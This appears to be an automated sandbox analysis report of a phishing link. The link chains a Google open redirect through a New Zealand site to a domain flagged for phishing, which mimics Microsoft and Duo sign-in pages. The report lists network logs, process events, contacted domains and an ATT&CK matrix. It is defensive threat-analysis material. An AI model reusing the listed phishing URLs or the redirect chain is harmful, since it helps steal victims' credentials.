Source: unknownNetwork traffic detected: HTTP traffic on port 55205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52942
Source: unknownNetwork traffic detected: HTTP traffic on port 55131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 52942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 55118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55148
Source: unknownNetwork traffic detected: HTTP traffic on port 55130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55151
Source: unknownNetwork traffic detected: HTTP traffic on port 55201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55152
Source: unknownNetwork traffic detected: HTTP traffic on port 55213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55207 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55159
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55164
Source: unknownNetwork traffic detected: HTTP traffic on port 55185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55165
Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55166
Source: unknownNetwork traffic detected: HTTP traffic on port 55164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55160
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55163
Source: unknownNetwork traffic detected: HTTP traffic on port 55174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55178
Source: unknownNetwork traffic detected: HTTP traffic on port 55158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55174
Source: unknownNetwork traffic detected: HTTP traffic on port 55129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55170
Source: unknownNetwork traffic detected: HTTP traffic on port 60718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55135 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55183
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55181
Source: unknownNetwork traffic detected: HTTP traffic on port 55141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55118
Source: unknownNetwork traffic detected: HTTP traffic on port 55203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55123
Source: unknownNetwork traffic detected: HTTP traffic on port 55168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55129
Source: unknownNetwork traffic detected: HTTP traffic on port 55193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55133
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55134
Source: unknownNetwork traffic detected: HTTP traffic on port 55139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55130
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60714
Source: unknownNetwork traffic detected: HTTP traffic on port 55123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55139
Source: unknownNetwork traffic detected: HTTP traffic on port 55156 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55138
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55143
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55140
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55141
Source: unknownNetwork traffic detected: HTTP traffic on port 55145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52954
Source: unknownNetwork traffic detected: HTTP traffic on port 52949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52955
Source: unknownNetwork traffic detected: HTTP traffic on port 55176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52950
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52951
Source: unknownNetwork traffic detected: HTTP traffic on port 55144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55209
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55207
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55203
Source: unknownNetwork traffic detected: HTTP traffic on port 55132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55211
Source: unknownNetwork traffic detected: HTTP traffic on port 52943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55177 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55215
Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55166 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:55125 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:55131 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:55190 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@30/116@55/20
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1896,i,3868343366678002382,12767044061446942759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1896,i,3868343366678002382,12767044061446942759,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-10-1.bdicJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
3
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==0%Avira URL Cloudsafe
https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==1%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://supernova.hethantac.com/3XdZQxT/100%Avira URL Cloudphishing
https://supernova.hethantac.com/favicon.ico100%Avira URL Cloudphishing
http://plimmerton.org.nz/jugz/0%Avira URL Cloudsafe
https://supernova.hethantac.com/3XdZQxT/5%VirustotalBrowse
http://plimmerton.org.nz/jugz/0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    www.google.ki
    142.250.186.131
    truefalse
      high
      jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru
      188.114.97.3
      truefalse
        high
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          supernova.hethantac.com
          188.114.96.3
          truefalse
            unknown
            sso-dbbfec7f.sso.duosecurity.com
            35.71.186.151
            truefalse
              high
              ux-asset-commercial.duosecurity.com
              18.66.102.12
              truefalse
                high
                code.jquery.com
                151.101.130.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    high
                    challenges.cloudflare.com
                    104.18.95.41
                    truefalse
                      high
                      plimmerton.org.nz
                      192.185.150.174
                      truefalse
                        unknown
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          high
                          www.google.com
                          142.250.186.132
                          truefalse
                            high
                            s-part-0032.t-0009.t-msedge.net
                            13.107.246.60
                            truefalse
                              high
                              www.microsoft365.com
                              unknown
                              unknownfalse
                                high
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  cisco.login.duosecurity.com
                                  unknown
                                  unknownfalse
                                    high
                                    identity.nel.measure.office.net
                                    unknown
                                    unknownfalse
                                      high
                                      excel.office.com
                                      unknown
                                      unknownfalse
                                        high
                                        login.microsoftonline.com
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          https://cisco.login.duosecurity.com/login/?authkey=AS4MUCDO6UZ8IV2XSQBD&scid=4873fe428ab243529767cba103466e46false
                                            high
                                            https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                              high
                                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                                high
                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638675056593270829.MDBmMDRmZWEtZThmMi00MGM5LWIyMDktMzU4NWJhZjNmZDgyOTk4MjYyZTQtZGJmZC00ZjQxLTk5YWQtMDUxZmE3MTEzNDVj&ui_locales=en-US&mkt=en-US&client-request-id=bd6b52e0-5340-4d63-be2e-ac65a40c1096&state=ikCCJ526d7I0PakMrcIK1-Lr0J2m3qA32gqD69wzjq4zra31APRoAl7Vgn-QZmsGPlF1aXHb_hzTPMk780AoIhthZOYWWsKmalODUUhoNVI2ol12E5LsYeBZJcdQZbfZX4plViS47oICJH450908fgeWCKESZbeI7lv0eiZebHkmNMjbA3Hs2T-uiOl0AFGVrMDjzfgqCz2aSYWHh_a9PpzMIqQUp4QBjsQeaobBo1QIlW0lDhYh6zYGmFAYwdi5KzSKq4PeRzf6t5625U04d27rHr_-F2cAh-LBhlSglRDm_HyAci3RjrCiZ-yfw0fBEBcJnzVF5Bq5M1_rkllQAA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                  high
                                                  https://cisco.login.duosecurity.com/email_first?authkey=AS0CZS9SWE2DVLOII3YX&scid=4873fe428ab243529767cba103466e46&req-trace-group=0f64bb06ada299a679628de5false
                                                    high
                                                    https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgfalse
                                                      high
                                                      https://cisco.login.duosecurity.com/static/css/page/login.css?v=8850efalse
                                                        high
                                                        https://cisco.login.duosecurity.com/static/js/page/email-first.js?v=488d0false
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e45aa726acf4857&lang=autofalse
                                                            high
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/false
                                                              high
                                                              https://cisco.login.duosecurity.com/email_firstfalse
                                                                high
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                  high
                                                                  https://supernova.hethantac.com/favicon.icofalse
                                                                  • Avira URL Cloud: phishing
                                                                  unknown
                                                                  http://plimmerton.org.nz/jugz/false
                                                                  • 0%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cisco.login.duosecurity.com/login/false
                                                                    high
                                                                    https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icofalse
                                                                      high
                                                                      https://cisco.login.duosecurity.com/static/images/favicon_duo.ico?v=e3716false
                                                                        high
                                                                        https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.jsfalse
                                                                          high
                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOgfalse
                                                                            high
                                                                            https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.jsfalse
                                                                              high
                                                                              https://supernova.hethantac.com/3XdZQxT/false
                                                                              • 5%, Virustotal, Browse
                                                                              • Avira URL Cloud: phishing
                                                                              unknown
                                                                              https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_IzDt-l0Cuie0gYRUoEk15w2.jsfalse
                                                                                high
                                                                                https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.jsfalse
                                                                                  high
                                                                                  https://cisco.login.duosecurity.com/login/?authkey=AS25IRIE37M5OV09AEPH&scid=4873fe428ab243529767cba103466e46false
                                                                                    high
                                                                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                      high
                                                                                      https://cisco.login.duosecurity.com/static/js/page/login.js?v=0f15cfalse
                                                                                        high
                                                                                        https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgfalse
                                                                                          high
                                                                                          https://cisco.login.duosecurity.com/static/shared/lib/jquery/jquery.min.js?v=ff152false
                                                                                            high
                                                                                            https://aadcdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jsfalse
                                                                                              high
                                                                                              https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.jsfalse
                                                                                                high
                                                                                                https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pidpredirect_e74b7f721910c56d695c.jsfalse
                                                                                                  high
                                                                                                  https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giffalse
                                                                                                    high
                                                                                                    https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2Ffalse
                                                                                                      high
